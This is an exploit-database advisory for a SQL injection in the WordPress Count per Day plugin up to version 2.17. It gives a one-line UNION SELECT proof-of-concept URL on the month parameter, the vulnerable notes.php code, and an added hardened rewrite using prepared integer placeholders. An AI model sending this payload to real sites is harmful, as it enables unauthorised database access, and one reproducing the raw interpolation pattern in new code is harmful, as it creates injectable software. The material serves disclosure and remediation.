WordPress Count Per Day 2.17 SQL Injection

2011.09.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.2.17.zip
# Version: 2.17 (tested)
# Note: Authors did one of the dirtiest things I've seen in a while :)
# I warned them 2 weeks ago about the vulnerability
# They've silently updated the affected v2.17 like nothing happened
# No mention of a "security" fix in the Changelog

--- PoC ---

http://www.site.com/wp-content/plugins/count-per-day/notes.php?month=-1 UNION ALL SELECT 1,version(),current_user()--%20

--------------- Vulnerable code ---------------

if ( isset($_POST['month']) )
    $month = $_POST['month']; // they've put (int) here
else if ( isset($_GET['month']) )
    $month = $_GET['month']; // they've put (int) here
else
    $month = date_i18n('m');
...
$where = '';
if ( $month )
    $where .= " AND MONTH(date) = $month ";
if ( $year )
    $where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);
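The silent fix the advisory mentions is an (int) cast on the request parameter. As an added example (not the plugin's own code), the following hardened form of the notes.php query goes one step further: it range-checks month and year and passes them to $wpdb->prepare() as %d placeholders, so request data can never reach the statement as raw text. It assumes the WordPress $wpdb object, $table_prefix global and date_i18n() exactly as the vulnerable snippet does; the year parameter source and the helper names cpd_safe_int and cpd_notes_query are assumptions.

```php
<?php
// Added, hardened version of the notes.php query from the advisory; not the
// plugin's own code. Assumes WordPress globals $wpdb and $table_prefix and the
// date_i18n() function are in scope, as in the vulnerable snippet. The helper
// names and the year parameter source are hypothetical.

// Return $value as an int only if it is a plain decimal string within
// [$min, $max]; otherwise null. Anything that is not purely digits (a sign,
// a space, a keyword) fails ctype_digit() and is dropped before SQL is built.
function cpd_safe_int($value, $min, $max) {
    if ($value === null || !ctype_digit((string) $value)) {
        return null;
    }
    $n = (int) $value;
    return ($n >= $min && $n <= $max) ? $n : null;
}

// Build the notes query with %d placeholders. $wpdb->prepare() substitutes
// each %d as an integer, so the query structure is fixed at coding time even
// if the range checks above were ever bypassed.
function cpd_notes_query($wpdb, $table_prefix, $month, $year) {
    $sql  = 'SELECT * FROM ' . $table_prefix . 'cpd_notes WHERE 1=1';
    $args = array();
    if ($month !== null) {
        $sql   .= ' AND MONTH(date) = %d';
        $args[] = $month;
    }
    if ($year !== null) {
        $sql   .= ' AND YEAR(date) = %d';
        $args[] = $year;
    }
    $sql .= ' ORDER BY date DESC';
    // prepare() accepts the argument list as an array.
    return empty($args) ? $sql : $wpdb->prepare($sql, $args);
}

// Same POST-then-GET precedence as the original, validated once at the point
// where untrusted input enters (date_i18n('m') yields e.g. "09" -> 9).
$raw_month = isset($_POST['month']) ? $_POST['month']
           : (isset($_GET['month']) ? $_GET['month'] : date_i18n('m'));
$raw_year  = isset($_POST['year'])  ? $_POST['year']
           : (isset($_GET['year'])  ? $_GET['year']  : date_i18n('Y'));

$month = cpd_safe_int($raw_month, 1, 12);
$year  = cpd_safe_int($raw_year, 1970, 2100);

$notes = $wpdb->get_results(cpd_notes_query($wpdb, $table_prefix, $month, $year), ARRAY_A);
```

An out-of-range or non-numeric value simply drops that filter instead of being interpolated, which is the behaviour the original code lacked.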

